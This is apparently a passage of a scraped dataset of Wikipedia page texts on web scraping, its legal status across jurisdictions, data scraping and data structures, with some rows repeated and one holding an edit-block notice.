Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
6 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#References | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
7 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Pages transcluded onto the current version of this page (help): Return to Data scraping. |
8 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-3 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
9 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_structures | In computer science, a data structure is a data organization, and storage format that is usually chosen for efficient access to data. 1 2 3 More precisely, a data structure is a collection of data values, the relationships among them, and the functions or operations that can be applied to the data, 4 i.e., it is an algebraic structure about data. Data structures serve as the basis for abstract data types (ADT). The ADT defines the logical form of the data type. The data structure implements the physical form of the data type. 5 Different types of data structures are suited to different kinds of applications, and some are highly specialized to specific tasks. For example, relational databases commonly use B-tree indexes for data retrieval, 6 while compiler implementations usually use hash tables to look up identifiers. 7 Data structures provide a means to manage large amounts of data efficiently for uses such as large databases and internet indexing services. Usually, efficient data structures are key to designing efficient algorithms. Some formal design methods and programming languages emphasize data structures, rather than algorithms, as the key organizing factor in software design. Data structures can be used to organize the storage and retrieval of information stored in both main memory and secondary memory. 8 Data structures can be implemented using a variety of programming languages and techniques, but they all share the common goal of efficiently organizing and storing data. 9 Data structures are generally based on the ability of a computer to fetch and store data at any place in its memory, specified by a pointer—a bit string, representing a memory address, that can be itself stored in memory and manipulated by the program. Thus, the array and record data structures are based on computing the addresses of data items with arithmetic operations, while the linked data structures are based on storing addresses of data items within the structure itself. This approach to data structuring has profound implications for the efficiency and scalability of algorithms. For instance, the contiguous memory allocation in arrays facilitates rapid access and modification operations, leading to optimized performance in sequential data processing scenarios. 10 The implementation of a data structure usually requires writing a set of procedures that create and manipulate instances of that structure. The efficiency of a data structure cannot be analyzed separately from those operations. This observation motivates the theoretical concept of an abstract data type, a data structure that is defined indirectly by the operations that may be performed on it, and the mathematical properties of those operations (including their space and time cost). 11 There are numerous types of data structures, generally built upon simpler primitive data types. Well known examples are: 12 A trie, or prefix tree, is a special type of tree used to efficiently retrieve strings. In a trie, each node represents a character of a string, and the edges between nodes represent the characters that connect them. This structure is especially useful for tasks like autocomplete, spell-checking, and creating dictionaries. Tries allow for quick searches and operations based on string prefixes. Most assembly languages and some low-level languages, such as BCPL (Basic Combined Programming Language), lack built-in support for data structures. On the other hand, many high-level programming languages and some higher-level assembly languages, such as MASM, have special syntax or other built-in support for certain data structures, such as records and arrays. For example, the C (a direct descendant of BCPL) and Pascal languages support structs and records, respectively, in addition to vectors (one-dimensional arrays) and multi-dimensional arrays. 14 15 Most programming languages feature some sort of library mechanism that allows data structure implementations to be reused by different programs. Modern languages usually come with standard libraries that implement the most common data structures. Examples are the C Standard Template Library, the Java Collections Framework, and the Microsoft .NET Framework. Modern languages also generally support modular programming, the separation between the interface of a library module and its implementation. Some provide opaque data types that allow clients to hide implementation details. Object-oriented programming languages, such as C , Java, and Smalltalk, typically use classes for this purpose. Many known data structures have concurrent versions which allow multiple computing threads to access a single concrete instance of a data structure simultaneously. 16 |
10 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-30 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they 